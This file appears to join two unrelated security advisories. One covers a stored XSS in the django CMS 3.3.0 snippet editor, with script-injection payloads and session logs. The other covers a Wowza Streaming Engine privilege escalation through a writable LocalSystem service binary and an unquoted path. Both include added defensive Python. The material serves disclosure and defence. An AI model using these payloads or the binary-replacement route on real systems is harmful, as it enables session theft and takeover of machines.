@ -0,0 +1,349 @@
Document Title:
===============
Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1869
Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
CVE-ID:
=======
CVE-2016-6186
Release Date:
=============
2016-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
1869
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
django CMS offers out-of-the-box support for the common features youd expect from a CMS, but can also be easily customised and
extended by developers to create a site that is tailored to their precise needs.
(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
Vulnerability Disclosure Timeline:
==================================
2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-07-04 Vendor Notification (Django Security Team)
2016-07-07: Vendor Response/Feedback (Django Security Team)
2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
2016-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Divio AG
Product: Django Framework - Content Management System 3.3.0
Divio AG
Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the
application-side of the vulnerable modules web context.
The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request.
Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution.
The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/`
data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any
payload inside of the option tag.
The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already
existing snippets on add.
Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in
the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Snippets (Add)
Vulnerable Input(s):
[+] Name
Parameter(s):
[+] select
Affected Module(s):
[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
Proof of Concept (PoC):
=======================
The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to your django cms website with version 3.3.0
2. Open the structure module
3. Click to edit a page module
Note: Now the editor opens with the main default plugins
4. Mark a text passage and click to the code snippets plugin that is configured by default installation
5. Click the plus to add a new snippet of code
6. Inject a script code payload in java-script to the input field of the Name
7. Save the entry iva POST method request
8. Now click the box to choose the vulnerable injected payload
9. The script code payload executes in the box listing without secure parse or filter to encode
10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
Note:
Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet
the stable saved categories provoke the execution of the payload.
PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
...
<fieldset class="module aligned ">
<div class="form-row field-snippet">
<div>
<label class="required" for="id_snippet">Snippet:</label>
<div class="related-widget-wrapper">
<select id="id_snippet" name="snippet">
<option value="">---------</option>
<option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
<option value="1">Social AddThis</option>
<option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
</select>
<a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related"
id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
<img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
</a>
<a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
<img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
</a>
</div>
</div>
</div>
</fieldset>
...
--- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
Status: 200[OK]
POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
POST-Daten:
POSTDATA =-----------------------------30880199939743
Content-Disposition: form-data; name="csrfmiddlewaretoken"
LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
-----------------------------30880199939743
Content-Disposition: form-data; name="_popup"
1
-----------------------------30880199939743
Content-Disposition: form-data; name="_to_field"
id
-----------------------------30880199939743
Content-Disposition: form-data; name="name"
test <img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
-----------------------------30880199939743
Content-Disposition: form-data; name="html"
sd
-----------------------------30880199939743
Content-Disposition: form-data; name="template"
aldryn_tour/tour.html
-----------------------------30880199939743
Content-Disposition: form-data; name="slug"
tour
-----------------------------30880199939743
Content-Disposition: form-data; name="_save"
Save
-----------------------------30880199939743--
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
-
Status: 301[MOVED PERMANENTLY]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
Content-Language[en]
-
Status: 200[OK]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html]
Reference(s):
http://django3-3-0.localhost:8080/
http://django3-3-0.localhost:8080/en/
http://django3-3-0.localhost:8080/en/admin/
http://django3-3-0.localhost:8080/en/admin/cms/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and validating the vulnerable Name input field in the add-snippet editor module.
Restrict the input and disallow special characters, or escape the submitted values and store them as plain text. Encode the snippet
name where the snippets module listing renders it, since that listing is the execution point of the vulnerability; output encoding at
the render point is what removes the injection, and restricting the input is defence in depth.
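As an added example (not code from the Vulnerability Lab advisory or from django CMS), the following Python shows the pattern the solution describes: a listing row that concatenates the snippet name unencoded, next to the hardened form that HTML-encodes the name at the render point, plus a regression check that parses the rendered row and fails if any element or inline event handler beyond the expected ones appears. The payload string, the row markup and the function names are this example's own assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed snippet name of the kind the advisory describes (hypothetical
# payload, not the exact string from the original report).
PAYLOAD_NAME = '"><img src=x onerror=alert(1)>'

# Hypothetical listing row; the admin URL mirrors the advisory's references.
SNIPPET_URL = "/en/admin/djangocms_snippet/snippet/2/"


def render_row_unsafe(name):
    """Vulnerable pattern: the snippet name is concatenated into the listing
    markup unencoded, so a crafted name becomes live HTML in the admin page."""
    return (f'<tr><td class="field-name">'
            f'<a href="{SNIPPET_URL}" title="{name}">{name}</a></td></tr>')


def render_row_safe(name):
    """Hardened form: HTML-encode the name at the render point. quote=True also
    encodes " and ', which matters inside the title attribute."""
    encoded = html.escape(name, quote=True)
    return (f'<tr><td class="field-name">'
            f'<a href="{SNIPPET_URL}" title="{encoded}">{encoded}</a></td></tr>')


class _TagCollector(HTMLParser):
    """Records every element a browser would create and any on* handlers."""

    def __init__(self):
        super().__init__()
        self.tags = []      # element names in document order
        self.handlers = []  # (tag, attribute) pairs for on* attributes

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for attr, _value in attrs:
            if attr.lower().startswith("on"):
                self.handlers.append((tag, attr))


def unexpected_markup(fragment, allowed=("tr", "td", "a")):
    """Return (unexpected tags, event handlers) found in a rendered fragment."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    extra = [t for t in parser.tags if t not in allowed]
    return extra, parser.handlers


def is_safe_rendering(fragment):
    """Regression check: the row must contain only the expected elements and no
    inline event handlers, whatever the snippet name was."""
    extra, handlers = unexpected_markup(fragment)
    return not extra and not handlers


if __name__ == "__main__":
    print("unsafe row safe?", is_safe_rendering(render_row_unsafe(PAYLOAD_NAME)))
    print("safe row safe?  ", is_safe_rendering(render_row_safe(PAYLOAD_NAME)))
```

The check parses the rendered fragment the way a browser would, rather than grepping for `<script>`, so it also catches payloads that rely on event handler attributes such as the `onerror` above.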
Resolution:
Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches.
The patches may be obtained from the following changesets:
- On the development master branch
- On the 1.10 release branch
- On the 1.9 release branch
- On the 1.8 release branch
The following new releases have been issued:
- Django 1.10rc1
- Django 1.9.8
- Django 1.8.14
Reference(s):
https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in django CMS is estimated as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@vulnerability-lab.com) to ask for permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Wowza Streaming Engine 4.5.0 Local Privilege Escalation
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: Wowza Streaming Engine 4.5.0 (build 18676)
Wowza Streaming Engine Manager 4.5.0 (build 18676)
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from an elevation of privileges
vulnerability: a low-privileged, locally authenticated user can replace
the service executable with a binary of choice. The vulnerability exists
due to improper file permissions, the 'F' (Full) flag being granted to
the 'Everyone' group on the service binary. Because both services run as
LocalSystem and start automatically, the replaced binary is executed with
SYSTEM privileges on the next service start. In addition to the insecure
file permissions, the application suffers from an unquoted search path
issue affecting the services 'WowzaStreamingEngine450' and
'WowzaStreamingEngineManager450', which are installed on Windows as part
of the Wowza Streaming software.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Java Version: 1.8.0_77
Java VM Version: 25.77-b03
Java Architecture: 64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5339
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php
03.07.2016
--
C:\Users\lqwrm>sc qc WowzaStreamingEngineManager450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngineManager450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine Manager 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>cacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe Everyone:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
==========
C:\Users\lqwrm>sc qc WowzaStreamingEngine450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngine450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>icacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
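As an added example (not part of the Zero Science advisory), the following Python parses the `sc qc` and `icacls`/`cacls` output shown above and turns it into findings: ACEs that grant Everyone or Users write access to the service binary, the alternative paths Windows probes for an unquoted image path, and the LocalSystem account a planted binary would inherit. The sample text is copied (abridged) from the advisory output; the function names and the principal and rights tables are this example's own assumptions.

```python
import re

# Abridged tool output copied from the advisory above, embedded as constructed
# sample input so the parsers run offline.
SC_QC_OUTPUT = r"""
SERVICE_NAME: WowzaStreamingEngine450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
DISPLAY_NAME : Wowza Streaming Engine 4.5.0
SERVICE_START_NAME : LocalSystem
"""
ICACLS_OUTPUT = r"""
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user belongs to (compared lower-cased); assumed table.
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users", "authenticated users",
                       r"nt authority\authenticated users", r"nt authority\interactive"}
# icacls simple rights F/M/W and cacls F/C/W let the file be replaced;
# (I), (OI), (CI) and (ID) are inheritance markers, not rights.
WRITE_RIGHTS = {"F", "M", "W", "C"}


def parse_sc_qc(text):
    """Map the KEY : VALUE lines of `sc qc` output to a dict."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]{2,})\s*:\s*(.*?)\s*$", line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def parse_acl_output(text, path=""):
    """Turn icacls/cacls lines into (principal, [rights]) pairs. icacls prints
    the file path before the first ACE; pass it so it can be stripped."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if path and line.startswith(path):
            line = line[len(path):].strip()
        principal, sep, perms = line.rpartition(":")
        if not sep or not perms.startswith("("):
            continue  # blank line or the "Successfully processed" summary
        tokens = re.findall(r"\(([^)]*)\)", perms)
        tail = perms[perms.rfind(")") + 1:]  # cacls writes "(ID)F"
        if tail:
            tokens.append(tail)
        aces.append((principal.strip(), [r for t in tokens for r in t.split(",")]))
    return aces


def weak_aces(aces):
    """ACEs that let a low-privileged principal overwrite the binary."""
    return [(p, r) for p, r in aces
            if p.lower() in LOW_PRIV_PRINCIPALS and WRITE_RIGHTS & set(r)]


def unquoted_path_candidates(image_path):
    """Paths CreateProcess probes, in order, for an unquoted image path with
    spaces: each space-delimited prefix (.exe appended when its last component
    has no extension), then the full string. A quoted path yields nothing."""
    p = image_path.strip()
    if not p or p.startswith('"') or " " not in p:
        return []
    out = []
    for i, ch in enumerate(p):
        if ch == " ":
            prefix = p[:i]
            out.append(prefix if "." in prefix.rsplit("\\", 1)[-1] else prefix + ".exe")
    out.append(p)
    return out


def assess_service(sc_text, acl_text):
    """Combine both tool outputs into findings for one service."""
    cfg = parse_sc_qc(sc_text)
    path = cfg.get("BINARY_PATH_NAME", "")
    weak = weak_aces(parse_acl_output(acl_text, path))
    hijack = unquoted_path_candidates(path)
    findings = []
    if weak:
        findings.append("binary writable by " + ", ".join(p for p, _ in weak))
    if hijack:
        findings.append(f"unquoted image path, {len(hijack) - 1} bogus paths probed first")
    if findings and cfg.get("SERVICE_START_NAME") == "LocalSystem":
        findings.append("service runs as LocalSystem, so a planted binary runs as SYSTEM")
    return {"service": cfg.get("SERVICE_NAME"), "binary_path": path,
            "weak_aces": weak, "hijack_paths": hijack, "findings": findings}


if __name__ == "__main__":
    for key, value in assess_service(SC_QC_OUTPUT, ICACLS_OUTPUT).items():
        print(f"{key}: {value}")
```

The unquoted-path list only shows where a hijack binary would have to be planted; it becomes a finding in its own right when one of those directories (here `C:\` or `C:\Program Files (x86)\Wowza Media Systems\`) is writable by the low-privileged user, which the advisory's output does not establish.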